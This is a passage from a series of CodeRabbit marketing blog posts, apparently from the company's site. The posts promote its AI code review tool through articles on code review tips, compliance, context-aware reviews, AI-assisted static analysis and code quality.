accuracy. Be open to tweaking its settings and rules based on real-world use to better fit your project’s needs. 5. **Educate your team:** Educate your team and contributors on how to make the most out of the AI code reviews. This includes understanding how to interpret the AI’s feedback, how to make corrections based on its suggestions, and how to override the AI when necessary. With AI code reviewers, project maintainers can significantly reduce the manual burden of code checks and ensure higher standards of quality and security. It saves valuable time while enhancing the overall development process. In the end, you’re making open source projects more robust and reliable. Want to get started with a completely free AI code reviewer? Try [CodeRabbit](https://github.com/marketplace/coderabbitai). Learn more at [CodeRabbit.ai](http://coderabbit.ai/).

10 Power Tips for Effective Code Reviews

Aravind Putrevu — Mon, 29 Apr 2024 00:00:00 GMT

Code reviews stand as a crucial checkpoint in software development, ensuring that the code is reliable, maintainable, and meets the set standards and best practices. They foster collaboration and knowledge sharing among developers, improving the overall code quality. ### CodeRabbit: Your Partner in Code Reviews Meet CodeRabbit, an AI-driven platform designed to revolutionize the way code reviews are conducted. It offers automated line-by-line feedback on code changes, suggesting improvements and corrections. This robust platform prioritizes security, privacy, and compliance, making it a trusted partner for over 1000 organizations worldwide. ## Understanding the Basics of Code Reviews Before delving into the power tips for effective code reviews, it is crucial to grasp the basics. Code reviews are an integral part of any development process and establishing a culture that values them is foundational. A culture that prioritizes code reviews fosters an environment of continuous learning and improvement. It encourages developers to work collectively, improving the code base while also enhancing their individual skills. The role of a tool like CodeRabbit becomes pivotal in this context. It not only facilitates the code review process but also enriches the learning environment. Another aspect that underscores the importance of code reviews is the need for regularity. Regular code reviews help in early detection of bugs and issues, saving a significant amount of time and resources in the later stages of development. This is where CodeRabbit truly shines. With its automated code review capabilities, CodeRabbit ensures that no code change goes unchecked. It makes regular code reviews seamless, effortless, and more effective. Lastly, a clear purpose is key in any code review. Whether [it is to improve code quality](https://coderabbit.ai/blog/code-reviews-made-easy-how-to-improve-code-quality) , share knowledge among the team, or ensure adherence to coding standards, having a defined purpose for each code review makes it more focused and productive. CodeRabbit aligns with this objective, offering detailed, line-by-line feedback on code changes, thus ensuring every review serves its purpose effectively. ## The Power Tips for Effective Code Reviews As we delve into the core of effective code reviews, it is key to highlight that these tips are not just theoretical. They can be seamlessly applied through a tool like CodeRabbit. This AI-driven platform is designed to revolutionize the way code reviews are conducted, optimizing the process while ensuring high-quality results. Let's start with the first power tip, highlighting issues in the code . One of the primary objectives of code reviews is to identify and rectify issues before they become problematic. CodeRabbit aids in this process by providing line-by-line feedback on code changes, making it easier to spot and fix errors. The next tip revolves around the importance of explaining relevant principles and the need for best coding practices . A code review isn't just about finding errors—it's also about enhancing the code's efficiency and robustness. CodeRabbit takes this a step further by suggesting improvements and corrections, educating developers about best practices along the way. Patience is a virtue, and nowhere is this truer than in code reviews. The importance of patience and relooking in code reviews cannot be overstated. If an issue isn't clear at first glance, taking the time to relook at the code can often provide clarity. CodeRabbit's automated review system allows for easy revisits to previously reviewed code, aiding in this process. Having a second level code reviewer can be invaluable in ensuring the quality of code reviews. CodeRabbit acts as a reliable second level reviewer, providing an additional layer of review to verify code changes. Its AI-driven feedback system can often catch errors or suggest improvements that may have been overlooked in the initial review. Documenting all code review comments is essential for future reference and continuous improvement. CodeRabbit automates this process , providing a record of all comments and changes made during the review process. This documentation can then be easily accessed for future reference or training purposes. Providing specific and actionable feedback is another crucial aspect of effective code reviews. Feedback should be constructive, respectful, and aimed at improving code quality, not criticizing the coder. CodeRabbit encourages this by providing clear, objective feedback that developers can easily understand and act upon. Utilizing tools and automation for code reviews is a game-changer. CodeRabbit revolutionizes this with AI, offering automated code reviews [that improve code quality](https://coderabbit.ai/ja/blog/code-reviews-made-easy-how-to-improve-code-quality) while significantly reducing the time and effort required for manual reviews. Attention to code style, best practices, security, and error handling is another power tip for effective code reviews. CodeRabbit.ai's AI-driven platform provides comprehensive verification of code changes, ensuring adherence to these crucial aspects. Finally, the importance of a code review checklist cannot be overstated. It provides a clear framework for the review process, ensuring that no important aspect is overlooked. CodeRabbit.ai's detailed feedback and documentation system can be instrumental in implementing such a checklist, ensuring a thorough and effective review process. In conclusion, these power tips, when coupled with an innovative tool like CodeRabbit.ai, can significantly enhance the effectiveness and efficiency of your code reviews. ## Conclusion In this informative journey, we've highlighted and delved into the key power tips for effective code reviews. From the necessity of regularly reviewing code and establishing a culture of reviews, to the importance of providing specific, actionable feedback and learning from each review, these guidelines serve as a roadmap for developers striving for excellence. Throughout this discussion, the role of CodeRabbit as a game-changer in the realm of code reviews has been emphasized. Its AI-driven platform allows CodeRabbit to streamline the review process, offering automated, line-by-line feedback on code changes. This innovation not only helps [improve code quality](https://coderabbit.ai/blog/code-reviews-made-easy-how-to-improve-code-quality), but it also alleviates the time and effort typically associated with manual reviews. But don't just take our word for it. We encourage you to experience the transformative impact of CodeRabbit for yourself. With a 7-day free trial and flexible pricing plans, there's no better time to elevate your code review process and achieve greater code efficiency and robustness. We look forward to welcoming you to the CodeRabbit community. ## Explore CodeRabbit Today! With CodeRabbit , code reviews become a breeze. Our platform's AI-driven approach enhances code quality and efficiency, transforming how reviews are conducted.

AI Code Reviews: Boosting Dev Team Performance

Aravind Putrevu — Fri, 26 Apr 2024 00:00:00 GMT

In traditional software development, developers often review each other's code manually, a time-consuming process that involves scrutinizing each line for errors and potential improvements. Regardless of experience, it’s a daunting task. It also slows down the development cycle and places a heavy burden on team dynamics, as it can lead to subjective judgments and inconsistent feedback. AI-driven code reviews [transform this aspect of development](https://coderabbit.ai/blog/how-ai-is-transforming-traditional-code-review-practices?) by automating the review process. They analyze code quickly and objectively, identifying issues and suggesting optimizations without human bias or fatigue. It's a shift that accelerates the review process and enhances the accuracy of the feedback. Developers that embrace this new technology shift their focus from correcting to creating, fostering a culture of innovation. ## Impact of AI code reviews on software development workflows AI-driven code reviews are profoundly impacting the speed, quality, and collaborative nature of development work. It's a significant shift for developers that’s making its mark on the industry. ### Accelerated development cycles Once developers submit code, the AI code reviewer assesses it with exceptional speed, processing vast amounts of information far quicker than a human could. The result is an accelerated development cycle that enhances code quality consistency. AI maintains a uniform standard throughout the review process, unlike human reviewers, who might experience fatigue or inconsistency. By automating mundane and repetitive coding tasks, these tools free up developers to focus on more complex and impactful work. This automation leads to a significant reduction in time to market, allowing products to reach consumers faster than ever. Moreover, with AI handling the heavy lifting, productivity skyrockets, turning what used to be a marathon into a sprint. ### Focus on higher-level design and problem-solving In application design, AI code reviews shift the focus from routine coding to strategic activities like architectural planning, system integration, and enhancing user experience. The change in focus allows developers to [spend more time brainstorming](https://coderabbit.ai/blog/ai-code-reviews-reclaims?) the next big idea or refining the system architecture. It also leads to a final product that is innovative and user-centric. ### Streamlined collaboration and knowledge sharing Embracing AI code reviews means everyone speaks the same coding language, follows the same best practices, and learns from each other continuously. Additionally, these systems act as a centralized knowledge base, providing consistent guidelines and suggestions that help teams sidestep common pitfalls and harness collective wisdom. By standardizing coding practices, AI code reviews make it easier for new and seasoned developers to collaborate effectively. Developers welcome these changes, as it enable them to develop software much faster and with greater precision. As a result, organizations see enhanced productivity and a marked improvement in overall product quality. ## Changes in skills requirements and training The introduction of AI in code reviews isn't just altering workflows; it's also reshaping the skill sets that software developers need to thrive. As coding becomes more automated, their focus must shift from traditional programming to a blend of technical knowledge and soft skills that emphasize adaptation and innovation. ### Shift towards domain-specific knowledge The more AI handles more of the routine coding tasks, the more developers find that deep industry knowledge is crucial. Understanding the specific challenges and needs of your industry can make or break the effectiveness of your coding efforts. It’s not enough to write code that works; it’s about crafting solutions that resonate with business objectives and user expectations. ### Emphasis on problem-solving and creativity In this new AI-enhanced environment creativity and problem-solving are highly valued. Developers are encouraged to think outside the box and use AI tools as springboards for innovative solutions. In this context, the ability to creatively leverage AI for complex problem-solving can set a developer apart from their peers. As a result, critical thinking and a knack for innovation are the prime attributes that set developers apart. ### Continuous learning and adaptation Staying relevant in a rapidly evolving tech environment means continuous learning is non-negotiable. Developers must keep pace with the latest AI technologies and programming languages. More importantly, adapting to new methodologies and tech landscapes becomes part of the daily routine. The landscape isn’t just changing—it’s evolving, and developers must evolve with it to leverage AI effectively and maintain their competitive edge. To stay competitive in the job market, developers must reevaluate their skills and embrace continual learning and development. This reflects a broader transformation across the tech industry where rapid adaptation and ongoing education aren't just beneficial—they're crucial for success. ## CodeRabbit: elevating dev teams with AI code reviews In software development, leading the way is about more than just keeping up with trends. That’s where [CodeRabbit comes in](https://coderabbit.ai/blog/coderabbit-deep-dive), transforming development with its AI-driven code review tools. CodeRabbit tailors its tools to align with your team's specific code review checklist and feedback. Moreover, it enhances the accuracy of its suggestions and seamlessly integrates organizational knowledge into your code reviews. Discover how [CodeRabbit can take your dev team](https://coderabbit.ai/blog/coderabbit-deep-dive) to the next level with AI-enhanced code reviews. Experience a new height of strategic thinking and innovation. Sign up today for a free trial and start transforming your dev team with the power of AI-driven code reviews.

The Role of AI Code Reviews in Compliance and Coding Standards

Aravind Putrevu — Wed, 24 Apr 2024 00:00:00 GMT

Developers follow coding standards and compliance rules to make sure all the software they build is safe, reliable, and compatible with other systems. However, coding standards and compliance rules can feel restrictive, like being told exactly how to do your job every step of the way. It can slow things down when you have to constantly check your work against specific rules, especially when you want to try something new or innovative. Taking fun and freedom out of the coding process was never the intention, but that is exactly what happens when a rulebook is introduced. With AI code reviews, this doesn't have to be the case. AI automates much of the repetitive work of ensuring compliance, freeing developers to focus more on creativity and innovation. It's a significant shift that streamlines workflows and fosters a more enjoyable coding environment. ## The Importance of Coding Standards and Compliance In software development, coding standards and compliance establish a common language and structured process that all developers adhere to. Following these guidelines produces software that is secure and interoperable with other systems. Think of these standards as the foundation of a building; without a strong foundation, the structure won't stand up to the elements, much like software won’t perform well without a solid base of clean, standardized code. Ignoring these coding standards can lead to some pretty serious issues. For starters, it can make the software difficult to maintain and update. Faulty attempts to decipher this code can cause a system to crash or open the door to hackers. Poorly written code can lead to security vulnerabilities, similar to leaving your doors unlocked in a crowded place. If your software isn’t up to standard, it's much easier for someone with bad intentions to sneak in and cause trouble.. Consequently, while developers might find it a hassle to stick strictly to these standards, it’s a necessity. No one likes to hear “rules exist for a reason.” But they keep your software safe, functional, and in line with legal requirements, acting as the guardrails that keep the software development process on track and out of trouble. ## Traditional Approaches to Code Reviews Code reviews have long been a staple in the software development world. They involve a developer or a team of developers checking each other's code for errors to meet all necessary standards before it goes live. While the intention is good, the [traditional methods of code reviews](https://coderabbit.ai/blog/how-ai-is-transforming-traditional-code-review-practices), like manual and peer reviews, come with their own set of challenges. A manual review is a process where a developer meticulously goes through code line by line. It's thorough but incredibly time-consuming. Imagine trying to find a few misspelled words in a novel-sized manuscript. Plus, it’s all too easy to miss errors just because of human fatigue. Staring at lines of code for hours isn’t exactly easy on the eyes or the brain. Peer reviews involve one or more colleagues reviewing the code. It adds a layer of collaboration, which is great for team dynamics and can bring new perspectives to the table. However, it's not without its flaws. Peer reviews can be inconsistent—different reviewers might have different opinions on what’s correct or best. There’s also the risk of bias. Maybe the reviewer had a long day, or perhaps they just don’t gel well with the coder—factors like these can influence the objectivity of the review. In short, traditional code reviews are a bit like proofreading by hand in a digital age—a necessary process, but one fraught with limitations in speed, accuracy, and efficiency. ## Benefits of AI in Code Reviews As technology evolves, so do the methods we use to ensure our code is top-notch. Enter AI code reviews, a modern twist on the traditional process that brings a lot of smarts and efficiency to the table. It’s an innovative approach that introduces a level of objectivity that is hard to achieve with human reviewers alone. AI code reviews bring an [elevated level of efficiency](https://coderabbit.ai/blog/boosting-engineering-efficiency) and fairness to how we handle code quality. It streamlines the review process, allowing for quicker iterations and consistent standards across all projects. * **Speed:** AI can process thousands of lines of code in the time it takes a human to make a cup of coffee. This means faster turnaround times and more efficient workflows. * **Consistency:** AI doesn’t have off days. It applies the same standards to every review, ensuring that every piece of code meets the same quality criteria, no matter who wrote it or when it was reviewed. * **Unbiased:** AI looks at the code and nothing but the code. It doesn’t care who wrote it, making its assessments based purely on the quality of the code, not the coder. The reliability, speed, and objectivity that AI brings to code reviews mark [a significant upgrade from traditional methods](https://docs.coderabbit.ai/blog/ai-transforming-traditional-code-review-practices/). It’s more than a minor improvement—it really boosts productivity and ramps up the overall quality of the software produced. ## AI Code Reviews for Enforcing Coding Standards AI code reviews act like the ultimate umpires, making sure that everyone on the team plays by the same rules. They're programmed to understand and enforce specific coding standards, so that every line of code works and meets the high standards your project demands. ### How CodeRabbit AI code reviews streamline development Take [the case of a developer](https://tomaszs2.medium.com/ai-can-make-a-code-review-for-free-a559cf74efa5) that integrated CodeRabbit’s AI code reviews into his GitHub account. Installation was straightforward: after a few clicks to set permissions and choose the service provider, his system was ready to review code pushed to repositories. He then used it in a basic Angular project, where it quickly identified key improvements and ignored trivial formatting, focusing instead on substantive changes. In his view, CodeRabbit provided immediate, insightful feedback like a mentor. The AI-powered code review highlighted significant issues and provided a summary of the merge request, focusing on key changes without getting bogged down by formatting errors, which it wisely ignored. It also included unique features like generating a summary of the merge request and offering a walkthrough of changes. CodeRabbit’s level of detail highlighted only the essential aspects of the code, avoiding minor issues to save [significant time and effort](https://coderabbit.ai/blog/ai-code-reviews-reclaims). ## AI Code Reviews for Ensuring Compliance AI code reviews make sure software adheres strictly to the rules, acting like a vigilant watchdog that's always on duty. They're not just about keeping code clean; they also make sure everything is in line with legal and regulatory standards. Here’s how AI steps up to make compliance less of a headache. ### Identifying non-compliance AI tools are incredibly sharp at spotting when something doesn’t add up to established compliance standards. Think of these tools as high-tech scanners that sift through code, looking for any deviations from required protocols. They catch slip-ups in critical areas such as data privacy under GDPR or health information protection under HIPAA. Taking a proactive approach here prevents costly violations and enhances the overall security of the software system. ### Role in continuous compliance monitoring Keeping up with compliance doesn’t end with the launch of a software product; it’s an ongoing process. That’s where AI really shines. An AI-powered system continuously monitors the code base, checking updates, patches, and changes to ensure compliance is maintained at every step of development and deployment. It keeps all adjustments within the compliance framework, making ongoing monitoring far less burdensome for development teams. However, the appeal doesn't stop there. As regulations evolve, AI systems can adapt to new requirements, automatically updating their checks and balances to align with the latest compliance standards. Adopting a proactive approach saves time and helps avoid potential legal issues down the road. ### Impact on meeting regulatory standards The real power of AI-driven code reviews is its ability to vastly reduce the risk of non-compliance penalties, which can be severe. AI’s precision in enforcing regulations protects businesses from legal issues and boosts their reputation for reliability and security. In an environment where a single slip-up can cost millions, AI provides a safety net that keeps your code—and your company—on the right side of the law. AI’s ability to automate compliance checks promotes continuous adherence, eliminating the need for constant manual oversight that can drain resources. As a result, developers focus more on innovation and less on regulatory red tape. ## Enhancing Compliance and Coding Standards with CodeRabbit AI Code Reviews AI technology is becoming a vital collaborator in the realm of compliance and coding standards. It is [increasingly capable of performing complex reasoning tasks](https://coderabbit.ai/blog/coderabbit-deep-dive), offering design suggestions, and recommending best practices that align with regulatory requirements. However, fully leveraging AI in code reviews and compliance requires a careful integration of human expertise with AI capabilities. This partnership excels in navigating the complexities of regulatory frameworks in software development. It enables organizations to boost their compliance, minimize errors, and foster a proactive culture of quality assurance across their development teams. Discover how CodeRabbit, the leading AI code review tool for GitHub and GitLab, can elevate your team's compliance and coding standards. Sign up today for a free trial and begin transforming your development process with the power of AI-driven compliance.

The Benefits of Context-Aware Code Reviews

Aravind Putrevu — Mon, 22 Apr 2024 00:00:00 GMT

Ever noticed how a little context can change everything? Understanding a friend’s mood before giving advice, or knowing the backstory before watching a sequel, shows just how much context matters. The same principle applies to coding. Without context, code reviews can miss the mark. Traditional approaches often focus on surface issues while deeper, more complex problems go unnoticed. That’s where context-aware code reviews step in. They bring a deeper understanding to the table, turning a routine check-up into a strategic asset. It’s a smarter approach to reviewing code that can transform the way your projects develop and ensure everything runs just as intended. ## What are Context-Aware Code Reviews? Code reviews act as regular check-ups to ensure your code runs [smoothly and efficiently](https://coderabbit.ai/blog/boosting-engineering-efficiency). However, there's a game-changer in the mix: context-aware code reviews. ### The depth of context-aware code reviews Context-aware code reviews go beyond the basics. Instead of just looking at lines of code for errors, these reviews understand the context in which the code operates. They consider items like the project's goals, the functionality of other parts of the code, and how recent changes might affect the overall system. Take APIs as an example. Context-aware reviews scrutinize how compatible they’re with existing systems, their impact on the software’s infrastructure, and whether they’re up to the mark with best practices. They enable APIs to integrate smoothly with your existing framework and effectively achieve your project's goals. Common factors considered in context-aware code reviews include: * **Adherence to coding standards:** Reviews ensure changes adhere to project-specific coding conventions, such as file naming and directory structures. They also assess whether the changes properly use existing libraries, classes, or methods instead of duplicating functionality. * **Impact on existing code:** Code reviews must assess whether changes introduce bugs into existing code and identify additional tests needed to prevent such issues. Reviewers also ensure that any necessary updates to API or user documentation are not overlooked. * **Infrastructure and performance considerations:** Reviews evaluate whether the change requires database or API migrations and consider the potential impact on system performance. They also check if the change could cause performance degradation in other parts of the codebase. * **Security and robustness:** The review process involves trying to "break" the new changes to find any potential bugs or security vulnerabilities. The goal here is to ensure new additions are robust and secure. * **Consistency and optimization:** Reviewers check for consistency in the new APIs with the existing API surface and assess whether the changelog entries accurately reflect the changes. They also consider if the presented solution is the most appropriate for the problem at hand. Context-aware code reviews, with their thorough approach, truly elevate the practice of software development. It’s not just about having automated checks, however. A solid understanding of the code base is essential for this process. In turn, they make sure every line of code performs well and seamlessly integrates with the entire system. ### The Difference from Traditional Code Reviews Traditional code reviews are somewhat like proofreading a document for grammar and spelling errors without worrying about the story or the intent behind it. Useful, yes, but possibly missing bigger issues like plot holes or character inconsistencies. Traditional code reviews are often [incredibly time-consuming](https://coderabbit.ai/blog/ai-code-reviews-reclaims). It's one of the slowest parts of software development, often becoming a bottleneck that delays the shipping of code. The slowdown happens because each team member has to meticulously review each line of code, checking everything from correctness and readability to performance and security. Imagine the time it takes to do this for just one pull request, now multiply that by several in a week. Then there's the issue of human error, which is all too common in manual code reviews. Reviewers have to juggle numerous factors to provide useful feedback and avoid missing anything crucial, which requires intense concentration. Despite best efforts, it's easy to miss subtle bugs or overlook potential security risks, especially when fatigued or under tight deadlines. In this situation, developers are prone to creating long-term problems that compromise the product's integrity and user trust. In contrast, context-aware code reviews look at the code as a part of a larger picture. Sure, they identify straightforward errors but also subtler issues that could affect the application's behavior in specific scenarios. ### Powered by AI and Machine Learning AI and machine learning are the driving forces behind the intelligence of these reviews. By leveraging these technologies, review tools can learn from past code, recognize normal patterns, and predict potential problems based on vast amounts of data. Their primary focus isn’t about catching a forgotten semicolon; it's about predicting how a small change could ripple through your system in unexpected ways. By incorporating AI, context-aware code reviews transform into a wise mentor for developers—constantly learning and adapting, offering insights tailored to optimize and secure code in ways that align perfectly with the intended use of the software. CodeRabbit exemplifies this approach by integrating AI into the review process, serving as both a guide and an assistant. Here’s how CodeRabbit elevates context-aware code reviews, providing features that not only streamline but also significantly enhance the development process: * **Pull request summaries:** CodeRabbit automatically generates comprehensive summaries of pull requests. It provides detailed walkthroughs that break down the changes introduced, organizing them by file or directory. As a result, developers can quickly grasp the modifications without the tedious process of manually testing and iterating through changes, significantly saving time and simplifying the review process. * **Chat with code:** CodeRabbit enhances the interactivity of code reviews by allowing developers to engage directly with the tool through a chat interface. Developers can ask for detailed explanations about suggested changes, propose alternatives, or provide corrections to enhance the tool’s learning. Having this capability transforms CodeRabbit into an always-available, knowledgeable teammate that makes the review process more engaging, insightful, and enjoyable. * **In-depth code reviews:** CodeRabbit conducts thorough, incremental reviews with each new commit, ensuring each piece of code is meticulously examined. Think of this feature as a second pair of eyes, spotting potential issues, bugs, or vulnerabilities that might be missed otherwise. For every issue detected, CodeRabbit offers detailed explanations and actionable suggestions, effectively serving as a coding buddy guiding the development process. * **Make direct changes:** CodeRabbit includes a "Committable suggestion" feature that allows developers to apply suggested changes directly, minimizing the risk of errors advancing to production and ensuring a higher quality final product. By leveraging these advanced features, CodeRabbit enhances [traditional code reviews](https://coderabbit.ai/blog/how-ai-is-transforming-traditional-code-review-practices). It acts as a supportive tool for developers, freeing them to concentrate on tackling more complex issues and making strategic decisions. ## Unpacking the Unique Advantages of Context-Aware Code Reviews Digging into the details of context-aware code reviews shows just how transformative they can be for software development projects. Far from just enhancing code quality, these advanced reviews revolutionize the developer experience and significantly influence project outcomes: * **Spot subtle discrepancies:** By understanding the full landscape of a project, context-aware reviews can detect subtle discrepancies that might otherwise go unnoticed under traditional review processes. These can include interactions between modules that could lead to unexpected bugs. * **Accelerate development cycles:** With their efficiency and precision, context-aware reviews streamline the development process. By reducing the cycle of feedback and revisions, they allow developers to progress faster, ultimately speeding up the entire project timeline. * **Improve software health and longevity:** By ensuring that new code integrates seamlessly with existing systems, these reviews help maintain a clean and scalable codebase. This not only improves current project stability but also extends the software's longevity and ease of future enhancements. * **Enhance security proactively:** These reviews proactively address potential security vulnerabilities by considering how changes affect the overall system, not just the immediate functionality. This holistic view helps prevent security issues before they become threats. * **Tailor developer support:** Beyond identifying issues, context-aware code reviews provide personalized feedback to developers, facilitating a learning environment that fosters continuous improvement and skill enhancement. Adopting context-aware code reviews really helps development teams step up their coding game and foster a more collaborative environment. It's a smart move that leads to fewer setbacks, lowers risk, and results in a stronger product. Building on this solid foundation of improved productivity and quality, [CodeRabbit is at the forefront](https://coderabbit.ai/blog/coderabbit-deep-dive), revolutionizing code reviews with our cutting-edge, context-aware solutions. We harness the power of advanced AI to provide more nuanced insights and feedback so that every piece of code fits perfectly within your project's framework. Embark on a journey of precision and innovation with CodeRabbit and discover how our context-aware code reviews can transform your development process.

Boosting Static Analysis Accuracy with AI

Aravind Putrevu — Thu, 18 Apr 2024 00:00:00 GMT

The phrase “static analysis” might sound fancy, but the concept is quite straightforward. Think of static analysis as a pre-check for software, kind of like proofreading an article before it's published. Before any software is actually used, it goes through this process where the code — basically the set of instructions that tell the software what to do — is reviewed while it's inactive, or 'static.' Stat analysis aims to catch any issues that could make the software hard to update or vulnerable to attacks, way before these problems can cause any harm. It's a way to make sure that by the time software reaches people like you and me, it's working smoothly and safe to use. However, this process isn’t perfect. Integrating AI with static analysis can significantly refine this procedure. ## Understanding Static Analysis Static analysis allows developers to examine their code before it runs. It helps them identify errors in the code so that it’s clean, efficient, and free of bugs from the start. This process involves scanning the program's code—checking for anything from syntax errors to potential security vulnerabilities—without the need to execute the program. It’s not really a luxury. Taking a preemptive approach enables developers to catch issues that could compromise the software's functionality or security later on. Using static analysis offers organizations these key benefits: * **Streamlines code compliance:** Static analysis simplifies adhering to coding standards, allowing your development team to deliver compliant code quickly without compromising speed. * **Enhances security:** Catches new vulnerabilities through SAST scans before code reaches production, reducing the risk of security breaches over time. * **Speeds up onboarding:** Helps maintain a clean and readable codebase, making it easier for new developers to get up to speed quickly. * **Improves reliability**: Reduces the likelihood of new defects being introduced into the code, enhancing software reliability over time. In the end, static analysis makes the whole development process more secure, fast, and reliable. It’s all about giving developers the tools they need to do their best work without any extra headaches. ### Common Culprits Caught by Static Analyzers Before diving into the specifics, let's consider what static analyzers actually do in the coding process. Think of them as the vigilant editors of the coding world. They look for a variety of issues that could spoil your code: * **Syntax errors:** Think basic mistakes like missing semicolons or mismatched parentheses — think of them as typos in your code. * **Potential bugs:** More subtle issues, like variables that are never used or set up incorrectly, which can lead to unexpected behaviors. * **Security vulnerabilities:** Serious flaws that could make your software an easy target for hackers, such as insecure data handling or breaches in authentication protocols. But It’s not perfect. While static analysis is extremely helpful, it’s not without its quirks. Traditional tools sometimes act like an overzealous editor who can’t quite grasp the context of your story. They might flag too many false positives: When a tool warns you about problems that aren’t actually problems. It might also miss the context: Sometimes, these tools don’t see the bigger picture. As a result, code analyzers might not understand how different pieces of your code interact, leading to missed issues or irrelevant warnings. In essence, while static analysis is an indispensable part of modern software development, it's not a silver bullet. It helps clean up code and catch issues early, but it also needs a bit of help itself to really understand what’s going on. That’s where AI comes into play. ## The Rise of AI in Software Development AI isn't just about robots and self-driving cars; it's also making big waves in the world of software development. Think of AI as that new assistant who not only helps with the heavy lifting but also brings some smart insights and ideas that change the way things are done. Its ability to greatly improve quality and efficiency promises to [transform the traditional coding canvas](https://coderabbit.ai/blog/how-ai-is-transforming-traditional-code-review-practices). ### Revamping Traditional Coding Practices AI is like a new power tool in the developer’s toolkit. Like a high-performance drill, it [speeds up construction and enhances precision](https://coderabbit.ai/blog/coderabbit-deep-dive). It’s impact is profound, transforming the coding game in several different ways: * **Automate the mundane:** From generating boilerplate code to sorting through databases, AI is taking over the tedious tasks, letting developers focus on the more creative aspects of programming. * **Spot errors before they bite:** Remember the static analyzers we talked about? AI is giving them a major upgrade. It’s like having a smarter, context-aware sidekick that not only finds the typos but also suggests the best ways to fix them. * **Predictive coding**: AI can predict what a developer wants to type next, almost like auto-complete on your phone but way smarter. It’s learning from the vast amounts of code it has seen before, making educated guesses to speed up the coding process. As AI evolves, it will bring even more sophistication and efficiency to software development. Think faster project completion and enhanced code quality, without the usual stress and extended work hours. ### Why Mix AI with Software Tools? AI is known for its remarkable ability to analyze and interpret data, enabling it to identify patterns and make predictions with unparalleled speed and accuracy. It also has the capacity to automate routine and complex tasks, increasing productivity and efficiency. AI constantly learns from new data, improving its performance over time and enabling it to make more informed decisions. By bringing AI into the mix, companies streamline their operations, optimize performance, and foster innovation, paving the way for more advanced and adaptive software solutions. The most notable benefits include: * **Boosted efficiency:** AI can automate complex tasks, which speeds up the development cycle significantly. More time for coffee breaks! * **Enhanced accuracy:** With AI’s ability to learn and adapt, it gets better at catching bugs and smoothing out processes over time. Think fewer headaches and late-night coding marathons. * **Innovative solutions:** AI can analyze data and user behavior to suggest new features or improvements that might not be obvious to human eyes. In short, AI in software development isn’t just a fad; it’s a transformative tool that’s making coding smarter, faster, and even a bit more fun. As AI continues to evolve, it’s exciting to think about all the new doors that could open for developers and businesses alike. ## AI-Enhanced Static Analysis Developers have a compelling reason to bring AI into the mix, beyond just the improved accuracy and efficiency. AI really personalizes the analysis process, tailoring its approach to fit each developer's unique style and the specific quirks of the project they're working on. It’s not a one-size-fits-all solution. Instead, this personalization allows AI-driven tools to provide more relevant insights and recommendations. In the end, [developers spend far less time](https://coderabbit.ai/blog/ai-code-reviews-reclaims) trying to decipher generic results. Additionally, AI fits right in with continuous integration tools, providing real-time analysis and feedback that’s crucial for agile development environments. This makes AI not just a tool for spotting errors, but a key player in making the whole development process more intuitive and responsive. ### Tackling false positives in static analysis. Have you ever had an alarm go off because you burnt your toast, making it seem like your kitchen was about to go up in flames? False positives in static analysis are kind of like that — annoying and often misleading. But here’s where AI steps in to save the day. By learning from patterns in code and past errors, AI can distinguish between what’s genuinely problematic and what’s just a false alarm. This means fewer interruptions and more focus on real issues. AI employs sophisticated algorithms, such as machine learning and deep learning, to get better at what it does over time. By analyzing historical data and past interactions, it reduces the rate of false positives on a continual basis. Not only does this make static analysis more accurate, it also speeds up the development process. Fewer false positives mean developers waste less time on dead ends. Plus, when AI handles the routine checks, it smooths out the workflow and boosts productivity. As a result, teams put more energy into innovation and other high-value development tasks. ### Smart techniques for Smarter Analysis AI isn't just one tool; it's an entire toolbox that brings different techniques to refine static analysis. Take machine learning (ML) models—the brainy statisticians of the AI world. ML models analyze vast amounts of code to learn what bugs look like, which helps them spot potential issues more accurately. [Natural language processing](https://www.techtarget.com/searchenterpriseai/definition/natural-language-processing-NLP) (NLP) is another powerful tool. It’s a technique that allows AI to understand code not just as cold syntax but almost like human language. By grasping the nuances of code as if it were human conversation, this understanding of the intent behind the code makes AI better at identifying actual errors and suggesting effective fixes. It's almost human-like, but purely analytical. In this context, NLP seamlessly aligns with developers' thought processes and enhances its intuitiveness. ## CodeRabbit Elevates Software Quality with Static Analysis CodeRabbit is at the cutting edge of software quality assurance and our approach to static analysis is transforming the way developers work. Leveraging advanced AI technologies, we enhance static analysis to perform deeper and more accurate code assessments. Our tools integrate seamlessly with the latest development environments, ensuring that your code not only meets but exceeds industry standards. [Join us on this transformative journey](https://app.coderabbit.ai/login?free-trial&_gl=1*1nnlmqs*_gcl_au*MTYyMzk4MDEzLjE3MDk3NTg2NDk.) and see how our innovative static analysis solutions can elevate your development process to new heights.

Code Reviews Made Easy: How to Improve Code Quality

Aravind Putrevu — Tue, 16 Apr 2024 00:00:00 GMT

The fastest way to tank a team's ability to improve code quality is to exhaust the people responsible for maintaining it. Most teams know how to improve code quality in theory: write tests, enforce standards, review every pull request (PR). The hard part is doing all of that without grinding senior engineers into dust. Adding more checklists, more review gates, and more meetings on top of an already-stretched team leads to resignations, not better software. This piece covers the practices, metrics, and workflow patterns that actually improve code quality while keeping cognitive load manageable. You’ll learn how to automate the cheap stuff, shrink the review surface, and save human judgment for the decisions only humans can make. ## What "code quality" actually means in modern development Code quality in modern development is the degree to which an engineer unfamiliar with the codebase can change it correctly. That breaks down into a few concrete properties: * **Maintainability:** A non-trivial change doesn't break something the author didn't know existed. * **Testability:** There's a reliable way to know the change worked before it ships. * **Security:** Credential handling, input validation, and the failure modes that turn into post-mortems. Code quality issues compound as technical debt. The work doesn't stop; it just costs more every time. The [Stack Overflow Developer Survey 2024](https://survey.stackoverflow.co/2024/professional-developers) confirmed that 63% of professional developers cite technical debt as their number-one frustration at work. Quality debt slows your team even more than it slows the code, and the engineers who feel it first are the senior ones doing the most reviews. ## Why traditional code quality practices break at scale [Code review bottlenecks](https://www.coderabbit.ai/blog/nobody-is-going-to-read-the-code) come more from cognitive load than scheduling. As teams grow, the volume of work that needs reviewing grows faster than the pool of senior engineers qualified to review it. Three structural patterns explain how that gap turns into a break: * **PR size:** Reviewers skim long diffs. Once a diff crosses the threshold of what one person can hold in their head, careful review turns into pattern-matching for the obvious stuff. * **Reviewer load:** Senior engineers carry the worst of the review burden, on top of architectural review, security review, and mentorship. [JetBrains' Developer Ecosystem Survey 2025](https://blog.jetbrains.com/research/2025/10/state-of-developer-ecosystem-2025/) confirms that coordination responsibilities increase with experience. * **AI-generated volume:** AI tools ship more PRs, and each PR carries more issues than human-only code. [CodeRabbit's State of AI vs Human Code Generation 